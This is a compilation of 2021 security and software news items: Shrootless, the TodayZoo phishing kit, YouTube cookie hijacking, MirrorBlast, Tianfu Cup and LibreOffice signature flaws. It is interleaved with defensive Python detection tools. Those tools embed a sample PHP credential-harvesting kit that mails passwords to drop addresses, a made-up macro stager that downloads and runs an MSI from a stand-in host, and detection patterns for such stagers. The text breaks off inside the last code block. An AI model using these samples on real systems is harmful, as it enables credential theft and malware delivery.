Microsoft researchers have discovered a vulnerability in the way Apple-signed packages with post-install scripts are installed, which could allow an attacker to bypass System Integrity Protection (SIP) on macOS.

SIP is a macOS security feature that prevents even the root user from performing operations that could compromise system integrity. The vulnerability, dubbed "Shrootless" and tracked as CVE-2021-30892, could allow a threat actor to plant a malicious file on a compromised system that hijacks the package installation process.

From there, the attacker could install a rootkit, overwrite system files, or install more persistent and harder-to-detect malware.

How Could the 'Shrootless' Bug Allow Attackers to Install a Rootkit on macOS Systems?



SIP, also known as "rootless", was introduced in OS X El Capitan; it locks the system down against root by building on Apple's sandbox technology to protect the platform as a whole.



The only legitimate way to disable SIP is to boot into Recovery mode and turn it off with the built-in csrutil tool, which can also display the current SIP status. The researchers therefore looked for macOS processes that are entitled to bypass SIP, which led them to the software daemon system_installd: its entitlement is inherited by any of its child processes, allowing them to circumvent SIP's file-system restrictions.

Successful exploitation could let a malicious actor modify protected parts of the file system, including installing malicious kernel drivers, also known as rootkits.
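The two checks a responder would actually run on a Mac after reading the above are whether SIP is on and which binaries carry a SIP-bypass entitlement that children inherit. This is an added example, not Microsoft's or Apple's code: it parses the output of `csrutil status` and the entitlements plist printed by `codesign -d --entitlements :- <path>`, keeping only the `com.apple.rootless.*` keys. The path for system_installd and the sample entitlement keys are assumptions not taken from the page; a key ending in `.heritable` is how an exemption that passes to child processes is expressed, which is the behaviour the article describes.

```python
"""SIP audit helpers (added example; assumed paths and sample keys)."""
import plistlib
import re
import subprocess
from typing import Dict

# Assumed install location of the daemon named in the article (not from the page).
SYSTEM_INSTALLD = ("/System/Library/PrivateFrameworks/PackageKit.framework/"
                   "Versions/A/Resources/system_installd")

_STATUS_RE = re.compile(r"System Integrity Protection status:\s*(\w+)", re.I)


def sip_enabled(csrutil_output: str) -> bool:
    """True if `csrutil status` output says SIP is enabled. A missing status
    line raises rather than returning False, so garbage cannot read as 'on'."""
    m = _STATUS_RE.search(csrutil_output)
    if m is None:
        raise ValueError("no 'System Integrity Protection status' line found")
    return m.group(1).lower() == "enabled"


def rootless_entitlements(entitlements_plist: bytes) -> Dict[str, object]:
    """Keep only the SIP-related keys from an entitlements plist (XML or binary)."""
    ents = plistlib.loads(entitlements_plist)
    return {k: v for k, v in ents.items() if k.startswith("com.apple.rootless.")}


def heritable_sip_bypass(rootless: Dict[str, object]) -> bool:
    """True if any SIP exemption is marked heritable, i.e. every child process
    (such as a post-install script spawned by the daemon) also gets it."""
    return any(k.endswith(".heritable") and v is True for k, v in rootless.items())


def audit_binary(path: str = SYSTEM_INSTALLD) -> Dict[str, object]:
    """Live check (macOS only): dump the entitlements with codesign and filter.
    ':-' asks codesign to write the plist to stdout; recent releases prefer
    '--xml', so adjust the flags if codesign rejects this form."""
    proc = subprocess.run(["codesign", "-d", "--entitlements", ":-", path],
                          capture_output=True, check=True)
    return rootless_entitlements(proc.stdout)


# Constructed samples (not captured from a real machine).
SAMPLE_CSRUTIL = "System Integrity Protection status: enabled.\n"
SAMPLE_ENTITLEMENTS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>com.apple.rootless.install.heritable</key>
  <true/>
  <key>com.apple.private.some-unrelated-entitlement</key>
  <true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    print("SIP enabled:", sip_enabled(SAMPLE_CSRUTIL))
    ents = rootless_entitlements(SAMPLE_ENTITLEMENTS)
    print("rootless entitlements:", ents)
    print("children inherit SIP bypass:", heritable_sip_bypass(ents))
```

Run `audit_binary()` on a Mac to see the real entitlements; the point of `heritable_sip_bypass` is that a process carrying such a key does not need a bug of its own to be dangerous, any script it spawns already runs outside SIP's file-system restrictions.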

How to Mitigate against the New 'Shrootless' Bug?



Microsoft shared the findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR), and a fix for the vulnerability was included in the security updates Apple released on October 26, 2021.

Apple therefore recommends that macOS users update their systems to protect against the issue, as the updated OS includes additional restrictions.

New SIP bypass vulnerability allows attackers to break into macOS systems

Despite the controversy surrounding its AI-driven programming assistant, Copilot, GitHub has gone ahead and added support for more editors, including JetBrains IDEs and Neovim, along with multiline code completions in languages such as C, C++, C# and Java.

While the early preview launched with a Visual Studio Code extension only and very few supported languages, Copilot now supports JavaScript, TypeScript, Python, Ruby and Go.

Copilot remains in preview, and the support for Neovim and the JetBrains IDEs is arriving in the next updates, with a focus on JetBrains' IntelliJ and PyCharm.

What is GitHub Copilot?



Copilot is an AI system powered by OpenAI Codex, trained on a selection of English-language text and on source code drawn from publicly available repositories on GitHub.



It draws on context such as class, function and method names and comments to synthesize code, offering developers suggestions for new lines or whole functions in the editor. GitHub says Copilot's suggestions are synthesized rather than verbatim copies of training code, and that safeguards are being implemented to keep verbatim snippets out of suggestions.

GitHub also found that Copilot suggests code snippets verbatim about 0.1% of the time, and noted that a fair amount of human review will still be required when working with Copilot.

How to Get Started with Copilot?



Developers can sign up for the waitlist to try Copilot via the GitHub Copilot portal.

The company says it is keen to engage developers in a discussion on these topics and to lead in setting up appropriate standards for training AI models.

GitHub Copilot extends support to JetBrains IDEs

F# 6 is Microsoft's effort to make F# simpler and faster, spanning language design, tooling and libraries, with the main goal of removing unnecessary hurdles on the path to adoption.

The new version is more uniform and more interoperable with other .NET languages; according to Microsoft, F# 6 ships with .NET 6 RC2 and Visual Studio 2022 RC2 and is the next step in making it easier to write robust, succinct and performant code.

Perhaps the major technical feature in F# 6 is a more performant way to author asynchronous tasks, with better interoperability with other .NET languages such as C#.

What's New in F# 6?



F# 6 finalizes "overloaded custom operations in computation expressions", which had been in preview since F# 5.0; the feature allows simpler DSLs in F#, including for web programming and validation.



F# already includes active patterns, which let users extend pattern matching in intuitive ways; F# 6 augments them with optional struct representations. Also, in F# 6 the "as" pattern can itself be a pattern, which matters when a type test has given a stronger type to an input.

The in-memory cross-project referencing feature simplifies working across C# and F# projects: changes in a C# project are reflected immediately in an F# project without recompiling the C# project to disk.

Additionally, F# developers benefit from .NET 6 improvements: packaging that satisfies the rules of commonly used Linux distributions, and profile-guided optimization, which can compile startup code at reduced binary size and higher quality and rearrange application binaries so that code used at startup is collocated at the start of the file.

How to Get Started with F# 6?



The F# 6 release coincides with the release of Visual Studio 2022 on Windows, and F# programmers using that IDE will benefit from several improvements in this release.

Visual Studio 2022 on Windows is now available as a 64-bit application, which means you can open, edit, run, and debug even the biggest and most complex solutions without running out of memory.

What's New in Microsoft’s F# 6 Programming Language?

The Microsoft 365 Defender Threat Intelligence Team has uncovered a unique phishing kit, dubbed TodayZoo, built from code copied from other kits that are publicly available for sale and are reused and repackaged by other kit resellers.

According to the team, the name "TodayZoo" was picked because of the curious use of those words in the kit's credential-harvesting component; in past campaigns this likely referred to phishing pages that spoofed a popular video-conferencing app.

TodayZoo contains pieces of code copied from other widely circulated kits, with the copied segments still carrying comment markers and other holdovers from the earlier kits, which gives rich insight into the state of phishing and email threats today.

What is a Phishing Kit?



Also known as a "phish kit", a phishing kit refers to the software components that facilitate phishing; most commonly it is an archive containing scripts and HTML pages that let an attacker easily set up an evasive phishing page to steal credentials.



These kits are sold in underground forums for a one-time payment. The term can also refer to the specific page that spoofs a brand to lure users into disclosing their credentials, which are then posted to an asset the attacker controls.

For instance, the researchers observed a series of phishing campaigns that abused the AwsApps[.]com domain to send email messages that eventually directed users to the spoofed landing pages; the attackers were able to create malicious accounts at scale, with sender addresses using randomly generated domain names.

How does TodayZoo represent the latest trends in the phishing landscape?



TodayZoo and other phishing kits offer several insights into the underground phishing landscape; they further show that most phishing kits derive from a smaller cluster of larger kit families.

Although this trend isn't new, it continues to be the norm, given how much code phishing kits share among themselves. The presence of dead links and callbacks to other kits also indicates that phishing kit distributors and operators have easy access to existing kits to reuse in building new ones faster.
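The conclusions above (copied code, leftover comment markers, dead callbacks) are reached by diffing kit archives, and the same triage is worth doing on any kit pulled from a takedown. The following is an added example, not Microsoft's tooling: given kit sources (PHP here), it extracts the exfiltration callbacks (hard-coded URLs and mail() recipients), lists comment markers, reports which markers are holdovers from a known kit, and scores how much code two kits share using normalised line hashes. The two kits below are constructed for the example; the domains are reserved or invalid names.

```python
"""Phishing-kit lineage triage (added example; constructed sample kits)."""
import hashlib
import re
from typing import Dict, List, Set

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
MAIL_RE = re.compile(r"\bmail\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
LINE_COMMENT_RE = re.compile(r"^\s*(?://|#)\s*(.+?)\s*$", re.M)
BLOCK_COMMENT_RE = re.compile(r"/\*(.*?)\*/", re.S)


def callbacks(src: str) -> Dict[str, List[str]]:
    """Where harvested credentials go: every URL and every mail() recipient."""
    return {"urls": URL_RE.findall(src), "mail_to": MAIL_RE.findall(src)}


def comment_markers(src: str) -> List[str]:
    """Full-line // and # comments plus /* */ blocks: the 'signatures' kit
    authors leave behind and repackagers rarely bother to remove."""
    found = [m.group(1) for m in LINE_COMMENT_RE.finditer(src)]
    found += [m.group(1).strip() for m in BLOCK_COMMENT_RE.finditer(src)]
    return [c for c in found if c]


def holdovers(kit: str, known: Dict[str, str]) -> Dict[str, List[str]]:
    """Comment markers in `kit` that also appear verbatim in a known kit."""
    mine = set(comment_markers(kit))
    result = {}
    for name, src in known.items():
        shared = mine & set(comment_markers(src))
        if shared:
            result[name] = sorted(shared)
    return result


def line_fingerprints(src: str) -> Set[str]:
    """SHA-1 of each normalised non-trivial line, so whitespace and case
    changes made while repackaging do not break the match."""
    fps = set()
    for line in src.splitlines():
        norm = re.sub(r"\s+", " ", line.strip()).lower()
        if len(norm) >= 12:
            fps.add(hashlib.sha1(norm.encode()).hexdigest())
    return fps


def shared_code_ratio(a: str, b: str) -> float:
    """Fraction of the smaller kit's lines that also occur in the other."""
    fa, fb = line_fingerprints(a), line_fingerprints(b)
    if not fa or not fb:
        return 0.0
    return len(fa & fb) / min(len(fa), len(fb))


# Constructed sample kits (not real TodayZoo code).
OLDER_KIT = r"""<?php
// Kit v2.1 by xxx - DO NOT RESELL
$ip = $_SERVER['REMOTE_ADDR'];
$message = "Email: " . $_POST['email'] . "\nPass: " . $_POST['pass'] . "\nIP: " . $ip;
mail("drop-one@example.net", "Rezult", $message);
header("Location: https://login.example-cdn.invalid/done.html");
?>
"""

NEWER_KIT = r"""<?php
// Kit v2.1 by xxx - DO NOT RESELL
/* todayzoo panel */
$ip = $_SERVER['REMOTE_ADDR'];
$message = "Email: " . $_POST['email'] . "\nPass: " . $_POST['pass'] . "\nIP: " . $ip;
mail("collector@example.org", "Rezult", $message);
$old = @file_get_contents("https://old-kit.invalid/ping.php");
header("Location: https://login.example-cdn.invalid/done.html");
?>
"""

if __name__ == "__main__":
    print(callbacks(NEWER_KIT))
    print(holdovers(NEWER_KIT, {"older_kit": OLDER_KIT}))
    print(f"shared code: {shared_code_ratio(OLDER_KIT, NEWER_KIT):.0%}")
```

The callback list is the part to act on first (block or sinkhole the drop addresses), while the holdover markers and the shared-code ratio are what let you attribute a "new" kit to the family it was cut from.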

Hackers deploy Phishing Kit in widespread Credential Stealing Attacks

MX Linux is a relatively popular GNU/Linux distribution that offers a complete operating system backed by the MX repositories, Debian and antiX Linux.

The MX Linux team has released MX Linux 21, based on Debian 11 "Bullseye" and running Linux kernel 5.10 LTS, with bug fixes and several application updates; it is the first stable release of the "Wildflower" series.

MX Linux 21 introduces a new edition built on Fluxbox 1.3.7, which runs well on high-end computers but is light enough on resources to support older machines too.

What's New in MX Linux 21 “Wildflower” Release?



MX Linux 21 includes the Fluxbox edition as a separate ISO file, alongside the regular Xfce and KDE desktop editions.



Fluxbox is a lightweight window manager capable of running on both older and modern systems; the MX community has customized it to offer a distinct desktop experience alongside a set of pre-installed Xfce apps. Other improvements in MX Linux 21:

  • Better Realtek Wi-Fi support
  • MX-Tour, showing an overview of each desktop environment
  • Xfce 4.16, Plasma 5.20, Fluxbox 1.3.7 with mx-fluxbox 3.0 configs
  • New UEFI live system boot menus, so UEFI live users can now select their live boot options
  • New installer partition selection and management area, including some LVM support if an LVM volume already exists, and the ability to set existing data partitions to be mounted on install
  • MX-Comfort default theming, including dark variants and "thick border" Xfwm variants
  • Mesa Vulkan drivers installed by default


The new UEFI live boot menus also add an extra "rollback" boot option, though the live system may not boot on systems with Secure Boot enabled.

How to Download or Upgrade to MX Linux 21?



For a fresh installation, download the MX Linux 21 ISO image from the official website, create a bootable MX Linux USB from it, and install.

Those already using the MX Linux 19 "Patito Feo" series can move to MX-21 by manually upgrading their packages.

MX Linux 21 “Wildflower” Release: What's New?

Microsoft has released a preview of Visual Studio Code for the Web, which offers a free, zero-install Visual Studio Code experience running completely in the browser.

This isn't the first attempt at bringing VS Code to the web: in 2019 Microsoft released a web-based version of its code editor, Visual Studio Online, initially in private testing with select developers. That initiative later morphed into GitHub Codespaces and remains under GitHub's direction.

The new VS Code for the Web provides many of the features of VS Code desktop, including search and syntax highlighting while browsing and editing, along with extension support to work on your codebase and make edits simpler.

How does VS Code for the Web differ from VS Code desktop?



The new VS Code for the Web is a browser-based version of the popular code editor that lets you easily navigate files and repositories and commit lightweight code changes.



For developers who need a runtime to run, build or debug their code, Microsoft recommends moving to the desktop application or GitHub Codespaces for the full capabilities of VS Code. VS Code desktop also lets you run extensions not yet supported in the web version and use the full set of keyboard shortcuts without browser limitations.

Because VS Code for the Web runs entirely in a web browser, it offers a very limited execution environment. Support for Azure Repos in VS Code for the Web is already in preview, and the experience is expected to improve over time.

Getting started with VS Code for the Web



VS Code for the Web is live at https://vscode.dev. You can create a local file or a new project, work on an existing local project, or access source code repositories hosted elsewhere, such as on GitHub and on Azure Repos, part of Azure DevOps.

To work with GitHub and Azure Repos, note that VS Code for the Web currently supports two routes: vscode.dev/github and vscode.dev/azurerepos.

Microsoft brings VS Code to the Web Browser

Social engineering campaigns use deception to get web users to disclose personal information that can be used for fraud, through techniques such as phishing, whaling and pharming.

Google's Threat Analysis Group (TAG) has disclosed that it is tracking a group of hackers recruited on a Russian-speaking forum who lure targets with fake collaboration opportunities in order to hijack their YouTube channels, then either sell the channels to the highest bidder or use them to broadcast cryptocurrency scams.

Because many YouTube creators list an email address on their channel for business opportunities, the attackers forge business emails impersonating an existing company and request a collaboration.

How do attackers use social engineering to hijack YouTubers' accounts?



Typically, the phishing starts with a custom email from the fake company introducing its products; if the target agrees to the deal, a malware landing page disguised as a software download URL is sent via email or a PDF, or in some cases via Google Docs containing the phishing links.



The attackers registered numerous domains for the forged companies and built multiple websites for malware delivery. According to TAG, at least 1,011 domains were created solely for this purpose; some of the websites were clones of legitimate software sites, such as Cisco's, or of games on Steam, while others were generated from online templates.

The researchers identified around 15,000 actor accounts, most of them created specifically for this campaign. The hackers also use a "pass-the-cookie attack", a session-hijacking technique in which session cookies stolen from the victim's browser are replayed to access the account without the password.

Though the technique has been around for some time, its resurgence may be due to the wider adoption of multi-factor authentication (MFA), which makes breaking into accounts with a password alone harder and hence drives the shift to social engineering tactics.
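From the defender's side, a replayed cookie leaves a recognisable trace: one session ID, authenticated once with MFA, is suddenly used from a different network and browser with no new login in between. The block below is an added example, not Google's detection logic, that runs that check over application logs. The log format, the events and the addresses (documentation ranges) are constructed for the example.

```python
"""Pass-the-cookie detection over app logs (added example; constructed log)."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class Event(NamedTuple):
    ts: datetime
    sid: str
    user: str
    ip: str
    ua: str
    action: str


LINE_RE = re.compile(
    r'^(?P<ts>\S+) sid=(?P<sid>\S+) user=(?P<user>\S+) ip=(?P<ip>\S+) '
    r'ua="(?P<ua>[^"]*)" action=(?P<action>\S+)$')


def parse_log(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # lines in another format are ignored, not guessed at
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(Event(**d))
    return events


def network_of(ip: str) -> str:
    """Coarse network key: a DHCP change inside one /24 (or /64) is not an
    alert, a jump to a different provider is."""
    addr = ipaddress.ip_address(ip)
    bits = 24 if addr.version == 4 else 64
    return str(ipaddress.ip_network(f"{ip}/{bits}", strict=False))


def detect_cookie_replay(events: List[Event],
                         max_age: timedelta = timedelta(hours=24)) -> List[Dict]:
    """Flag sessions used from a (network, user agent) pair other than the one
    that performed the login. `max_age` bounds how long after login we look."""
    by_sid: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        by_sid[e.sid].append(e)

    alerts = []
    for sid, evs in by_sid.items():
        evs.sort(key=lambda e: e.ts)
        login = next((e for e in evs if e.action.startswith("login")), None)
        if login is None:
            continue  # no login seen for this session, nothing to compare against
        baseline = (network_of(login.ip), login.ua)
        foreign = [e for e in evs
                   if login.ts < e.ts <= login.ts + max_age
                   and (network_of(e.ip), e.ua) != baseline]
        if foreign:
            alerts.append({
                "sid": sid, "user": login.user, "login_from": baseline,
                "replayed_from": sorted({(network_of(e.ip), e.ua) for e in foreign}),
                "actions": [e.action for e in foreign],
            })
    return alerts


# Constructed log: session 7f3a is replayed from another network/browser and
# immediately used to change recovery settings; session 9c1d is benign.
SAMPLE_LOG = """\
2021-10-20T09:00:01Z sid=7f3a user=creator01 ip=203.0.113.10 ua="Chrome/94 Windows" action=login_mfa_ok
2021-10-20T09:05:12Z sid=7f3a user=creator01 ip=203.0.113.10 ua="Chrome/94 Windows" action=view_dashboard
2021-10-20T09:41:33Z sid=7f3a user=creator01 ip=198.51.100.77 ua="Firefox/93 Linux" action=change_recovery_email
2021-10-20T09:42:05Z sid=7f3a user=creator01 ip=198.51.100.77 ua="Firefox/93 Linux" action=change_password
2021-10-20T10:00:00Z sid=9c1d user=creator02 ip=192.0.2.5 ua="Safari/15 macOS" action=login_mfa_ok
2021-10-20T10:30:00Z sid=9c1d user=creator02 ip=192.0.2.9 ua="Safari/15 macOS" action=upload_video
"""

if __name__ == "__main__":
    for alert in detect_cookie_replay(parse_log(SAMPLE_LOG)):
        print(alert)
```

The useful response is not just the alert but what it enables: binding the session to the login's network and client fingerprint server-side, and forcing re-authentication for sensitive actions such as changing the recovery email, which is exactly the step the replayed session above performs.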

How to Mitigate against Social Engineering Attacks?



As threat actors become more sophisticated, web users need to stay aware of these kinds of threats and take appropriate steps to protect their accounts.

Most importantly, enable multi-factor authentication, which adds an extra layer of security if a password is leaked or stolen. Also enable the "Enhanced Safe Browsing Protection" mode in the Chrome browser, which increases warnings on potentially suspicious web pages.

YouTube Influencers targeted in New Social Engineering Campaign

Threat actors have mostly targeted financial companies, and the reason is not far-fetched: these organizations hold a trove of customer data that is a gold mine for hackers.

MirrorBlast is a massive phishing campaign targeting financial services organizations. Its emails contain malicious links that download a weaponized Excel document, and because the macro embedded in the Excel file is extremely lightweight, it is particularly difficult for security and sandboxing technologies to detect.

The campaign, tracked by the Morphisec Labs team, began in early September, with an infection chain similar to the tactics, techniques and procedures commonly used by the Russia-based threat group TA505.

How does MirrorBlast spread through mass email campaigns?



The MirrorBlast attack chain starts with an email attachment posing as a file-share request; at a later stage this changed to a Google feedproxy URL with a SharePoint or OneDrive lure.



The Google feedproxy URLs lead to a compromised SharePoint site or a fake OneDrive site that the attackers use to evade detection, with a SharePoint sign-in requirement that also helps evade sandboxes. There are several variants of the document: in the first variants the macro code was hidden in the Language and Code document information properties, and it was later moved to the sheet cells.

The later variants contained no anti-sandboxing code, but added one more obfuscation layer on top of the previous one.

The campaign's success hinges on users enabling macros after opening the malicious attachment, after which an obfuscated MSI file is downloaded to install the next-stage loaders before delivery of an updated version of the Trojan that incorporates obfuscated API calls.
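Both hiding places named above, the document information properties and the sheet cells, live in plain XML parts inside the Office Open XML zip, so they can be triaged without opening the file in Excel. The block below is an added example, not Morphisec's code: it checks for a VBA project, for property values in docProps/*.xml that look like code rather than metadata, and for the same in shared cell strings. The sample workbooks are constructed minimal zips, not complete Excel files, and the staging command and URL in them are made up.

```python
"""Macro-document triage for OOXML hiding spots (added example; constructed samples)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Tokens that belong in a stager, not in a "Company" or "Title" property.
CODE_LIKE = re.compile(r"(CreateObject|WScript\.Shell|msiexec|Chr\(|Execute\b|https?://)", re.I)
MAX_METADATA_LEN = 120  # longer than any sane metadata value


def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]


def _suspicious(text: str) -> bool:
    return len(text) > MAX_METADATA_LEN or bool(CODE_LIKE.search(text))


def triage_ooxml(data: bytes) -> List[Tuple[str, str]]:
    """Return (kind, detail) findings; kind is 'vba', 'docprop' or 'cell'."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            findings.append(("vba", "vbaProject.bin present: document carries macros"))
        for n in names:
            if n.startswith("docProps/") and n.endswith(".xml"):
                for el in ET.fromstring(z.read(n)).iter():
                    text = (el.text or "").strip()
                    if text and _suspicious(text):
                        findings.append(("docprop", f"{n} <{_local(el.tag)}>: {text[:60]}..."))
            elif n == "xl/sharedStrings.xml":
                for el in ET.fromstring(z.read(n)).iter():
                    text = (el.text or "").strip()
                    if _local(el.tag) == "t" and text and _suspicious(text):
                        findings.append(("cell", f"shared string: {text[:60]}..."))
    return findings


# Made-up stager text, used only to exercise the checks.
STAGER = ('Set o = CreateObject("WScript.Shell"): '
          'o.Run "msiexec /i https://fileshare.invalid/update.msi /qn", 0')


def build_sample(payload_in_properties: bool) -> bytes:
    """Constructed workbook with the stager either in docProps/app.xml
    (as in the first variants) or in a sheet cell (as in the later ones)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 28)  # OLE header stub
        props = ('<Properties xmlns="http://schemas.openxmlformats.org/'
                 'officeDocument/2006/extended-properties">'
                 '<Application>Microsoft Excel</Application>')
        strings = ('<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
                   '<si><t>Enable Content to view this document</t></si>')
        if payload_in_properties:
            props += f"<Company>{STAGER}</Company>"
        else:
            strings += f"<si><t>{STAGER}</t></si>"
        z.writestr("docProps/app.xml", props + "</Properties>")
        z.writestr("xl/sharedStrings.xml", strings + "</sst>")
    return buf.getvalue()


if __name__ == "__main__":
    for in_props in (True, False):
        where = "properties" if in_props else "cells"
        print(f"payload in {where}:", triage_ooxml(build_sample(in_props)))
```

A heuristic like this is a mail-gateway or sandbox pre-filter, not a verdict: the macro itself still has to be extracted (for example with oletools) to see what it reads from those properties or cells at run time.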

How to Mitigate against MirrorBlast Phishing Campaign?



The MirrorBlast samples have very low detection rates on VirusTotal, which shows how far most threat groups have advanced in evading detection-centric solutions.

Organizations should therefore take a defensive rather than purely reactive approach to their security and, most importantly, remain constantly vigilant, iterating on security procedures so they are not caught off-guard when new TTPs are deployed against their defenses.

New Email Phishing Campaign targeting Financial Companies

Tianfu Cup is China's equivalent of Pwn2Own; its fourth edition, like last year's, took place in Chengdu, China.

Tianfu Cup 2021, which has just ended, featured hacking attempts against a number of popular programs, including Windows 10, Linux and browsers such as Chrome and Safari, with the contestants successfully compromising several of them.

Multiple other software products from Microsoft, Adobe, Mozilla and ASUS were also successfully hacked using previously unknown exploits at Tianfu Cup 2021.

Major Exploits at Tianfu Cup 2021 Hackathon



The two-day contest took place on October 16 and 17, with several security research teams competing for prize money. Kunlun Lab took the top spot, winning $654,500 for successful exploits that included a remote code execution flaw in mobile Safari on iOS 15.



The Kunlun Lab researchers also pwned Google Chrome and gained Windows kernel-level privileges using two bugs. The Pangu team came second with a haul of $522,500 for a remote jailbreak of an iPhone 13 Pro running iOS 15, the first time the new iPhone model has been hacked at a public contest, while the VRI team came third with $392,500.

Besides the above exploits, several hacks were mounted successfully against targets such as:

  • VMware Workstation
  • Ubuntu 20/CentOS 8
  • Microsoft Exchange Server
  • Adobe PDF Reader
  • ASUS RT-AX56U router
  • Parallels Desktop
  • Docker CE
  • QEMU VM


The competition also saw successful attempts against VMware ESXi and the Synology DS220j DiskStation, among others.

The overriding idea of the Tianfu Cup is to take control of the browser, or of the underlying operating system, by having it navigate to a remote URL or by using a flaw in the target software.

Tianfu Cup Hackathon ended with iOS 15, Chrome and Windows 10 pwned

The latest non-LTS release, Ubuntu 21.10, codenamed "Impish Indri", is now available for download; as a non-LTS release it will receive support for only nine months, until July 2022.

The current Long-Term Support (LTS) release, Ubuntu 20.04 LTS, receives updates and improvements until 2025, or until 2030 with Extended Security Maintenance. So let's see whether there are compelling features that would make Ubuntu 20.04 LTS users want to upgrade to this non-LTS release.

The codename for Ubuntu 21.10, Impish Indri, refers to "showing no respect for something in a way that is amusing" or, to put it another way, being inclined to mischief.

What’s New in Ubuntu 21.10 “Impish Indri” Release?



Ubuntu 21.10 brings the long awaited GNOME 40, which is an exciting upgrade and several other notable improvements.



GNOME 40 offers a refreshing change to Ubuntu, though you can only really tell after experiencing it. Here's a quick rundown of what to expect with this release.

  • Refreshed Installer
  • PulseAudio 15 with Bluetooth LDAC support
  • Wayland Session with NVIDIA Proprietary Driver
  • Package updates to LibreOffice, Thunderbird
  • Firefox as a Snap by default
  • Linux Kernel 5.13


Additionally, the mixed theme has been dropped in Ubuntu 21.10 in favour of plain light/dark theming. And the inclusion of Linux kernel 5.13 brings support for newer Intel and AMD chips, as well as initial Apple M1 support.

How to Download or Upgrade to Ubuntu 21.10?



For a fresh installation, the ISO image of Ubuntu 21.10 is now available for download on the official website. Existing users of Ubuntu 20.04 LTS get the option to upgrade through the Update Manager, provided they have set it to notify them of every new release rather than only LTS releases.

However, it is recommended that users of Ubuntu 20.04 LTS should wait for the next LTS release, Ubuntu 22.04 LTS.

Ubuntu 21.10 “Impish Indri” Release: What’s New?

LibreOffice is an open-source office productivity suite, widely used on Linux distributions, developed and maintained by The Document Foundation.

LibreOffice supports digital signatures for ODF documents and for macros within them, and presents visual cues indicating that the document has not been altered since it was last signed and the signature validated. But several vulnerabilities in how LibreOffice handles these documents, including an Improper Certificate Validation issue, could allow an attacker to produce a digitally signed ODF document that appears valid.

The attacker could modify a digitally signed ODF document to insert an additional signing-time timestamp by manipulating the documentsignatures.xml or macrosignatures.xml stream within the document, which LibreOffice would then present as a valid signature.

How could exploiting the flaws allow an attacker to manipulate the timestamp of signed ODF documents?



Exploiting the three flaws could permit an attacker to alter the contents of a document, to self-sign a document with an invalid signature, or to manipulate the timestamp of a signed ODF document.



LibreOffice would then incorrectly display a valid-signature indicator, suggesting the document has not been tampered with since signing, and would present a signature with an unknown algorithm as legitimately issued by a trusted party.

The vulnerabilities could also be weaponized by malicious actors to alter documents, making them appear as if digitally signed by a trusted source.
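The timestamp manipulation described above is a structural problem in the signature XML, so it can be checked independently of the cryptography. In ODF, META-INF/documentsignatures.xml is XML-DSig: the signing time is a dc:date inside a ds:SignatureProperty, and that date is only trustworthy if the property has an Id that one of the signature's ds:Reference elements covers (otherwise it is not under the signature at all). A second, uncovered dc:date is exactly the extra timestamp an attacker can splice in. The block below is an added example, not LibreOffice's verifier; the signature XML is constructed, the digest and signature values are placeholders, and the cryptographic verification itself is left to a real XML-DSig library.

```python
"""Structural check for spliced-in ODF signing times (added example; constructed XML)."""
import xml.etree.ElementTree as ET
from typing import List, Optional

NS = {"ds": "http://www.w3.org/2000/09/xmldsig#",
      "dc": "http://purl.org/dc/elements/1.1/"}


def check_signing_times(xml_bytes: bytes) -> List[str]:
    """Return a list of problems; an empty list means every signing time is
    covered by a ds:Reference and there is exactly one per signature."""
    issues = []
    root = ET.fromstring(xml_bytes)
    for sig in root.iter(f"{{{NS['ds']}}}Signature"):
        sid = sig.get("Id", "<no Id>")
        covered = {r.get("URI")[1:] for r in sig.iter(f"{{{NS['ds']}}}Reference")
                   if (r.get("URI") or "").startswith("#")}
        dates = sig.findall(".//dc:date", NS)
        if len(dates) != 1:
            issues.append(f"{sid}: expected exactly one dc:date, found {len(dates)}")
        for prop in sig.iter(f"{{{NS['ds']}}}SignatureProperty"):
            if prop.find(".//dc:date", NS) is None:
                continue
            pid = prop.get("Id")
            if not pid or pid not in covered:
                issues.append(f"{sid}: signing time in SignatureProperty Id={pid!r} "
                              "is not covered by any ds:Reference")
    return issues


def trusted_signing_time(xml_bytes: bytes) -> Optional[str]:
    """The single covered signing time, or None when the structure is not clean."""
    if check_signing_times(xml_bytes):
        return None
    date = ET.fromstring(xml_bytes).find(".//dc:date", NS)
    return date.text if date is not None else None


# Constructed documentsignatures.xml with one properly referenced signing time.
GOOD = b"""<?xml version="1.0" encoding="UTF-8"?>
<document-signatures xmlns="urn:oasis:names:tc:opendocument:xmlns:digitalsignature:1.0"
    xmlns:ds="http://www.w3.org/2000/09/xmldsig#" xmlns:dc="http://purl.org/dc/elements/1.1/">
 <ds:Signature Id="ID_1">
  <ds:SignedInfo>
   <ds:Reference URI="content.xml"><ds:DigestValue>PLACEHOLDER=</ds:DigestValue></ds:Reference>
   <ds:Reference URI="#ID_1_props"><ds:DigestValue>PLACEHOLDER=</ds:DigestValue></ds:Reference>
  </ds:SignedInfo>
  <ds:SignatureValue>PLACEHOLDER=</ds:SignatureValue>
  <ds:Object>
   <ds:SignatureProperties>
    <ds:SignatureProperty Id="ID_1_props" Target="#ID_1">
     <dc:date>2021-03-01T10:00:00</dc:date>
    </ds:SignatureProperty>
   </ds:SignatureProperties>
  </ds:Object>
 </ds:Signature>
</document-signatures>
"""

# The same file with an extra, unreferenced signing time spliced in after the fact.
SPLICED = (b'<ds:Object><ds:SignatureProperties><ds:SignatureProperty Target="#ID_1">'
           b'<dc:date>2019-01-01T00:00:00</dc:date>'
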